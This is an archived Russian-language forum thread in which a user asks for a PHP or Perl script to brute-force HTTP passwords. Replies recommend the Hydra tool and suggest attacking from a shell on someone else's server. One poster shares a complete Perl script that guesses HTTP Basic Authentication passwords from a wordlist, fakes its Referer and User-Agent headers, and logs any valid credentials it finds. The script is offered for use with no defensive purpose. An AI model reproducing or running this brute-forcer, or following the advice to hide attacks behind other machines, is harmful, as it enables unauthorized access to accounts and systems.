Просмотр полной версии : Подбор паролей к Xxx
Кто нибудь знает где можно достать скрипт для подбора паролей по http на PHP или Perl'e. Заранее благодарен!
Задай вопрос на securitylab.ru, там подскажут, только все указывай конкретно и выкладывай как можно больше информации об объекте!!!
а чем те Hydra не нравится???лучший брутфорс.ищи через поисковик....
а чем те Hydra не нравится???лучший брутфорс.ищи через поисковик....
Со своего компа брутить - это не дело.
необязательно со своего компа можно и с шелла)
вот скриптик на перле
#!/usr/bin/perl
use MIME::Base64;
use IO::Socket;
if(@ARGV < 5)
{
print q(
.:: Skides DiGiTaL Security ::.
------------------------------------
HTTP-Basic brutforce by rav3n!
Usage: SHTTP.pl [HOST] [PORT] [DIR] [USER] [DIC]
);
exit 0;
}
$server = $ARGV[0];
$port = $ARGV[1];
$dir = $ARGV[2];
$user = $ARGV[3];
$words = $ARGV[4];
$foundpass = "success.log";
$nowcheck = "now.log";
open(FILE, "$words") || die print "$!\n";
while($pass = <FILE>)
{
$i++;
chomp($pass);
open(NOW,">$nowcheck") || die print "$!\n";
print NOW "now $user:$pass -> check $i item\n";
close NOW;
$access = encode_base64("$user\:$pass");
chomp($access);
$socket=IO::Socket::INET->new(
PeerAddr => $server,
PeerPort => $port,
Photo => tcp
)
|| die print "Unable to connect to $server:$port\n";
print $socket "GET $dir HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Referer: http://microsoft.com/\n";
print $socket "User-Agent: Internet Explorer 6.0\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Authorization: Basic $access\n";
print $socket "Connection: close\n\n";
while(<$socket>)
{
if(/(HTTP\/1\.[0-1]\s200\sOK)/)
{
open(FILE,">$foundpass") || die print "$!\n";
print FILE "SUCCESS!!! valid $user:$pass";
close FILE;
unlink($nowcheck);
exit 0;
}
}
close $socket;
}
перенесено в PHP,Perl,MySQL
так как к халяве никакого отношения не имеет и название XXX тут не причем
Блин, а я то подумал что порнушку нахаляву дадут посмотреть... :d
Ну да ладно, скажу только что брутфорс на перле или пхп это не дело, ты быстрее с того-же самого диалапа гидрой пароль подберёшь или через шелл на серваке, тем более что на многих хостах стоит ограничение на время выполнения скриптов.
Ну да ладно, скажу только что брутфорс на перле или пхп это не дело, ты быстрее с того-же самого диалапа гидрой пароль подберёшь
Так я и не куда не тороплюсь :)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot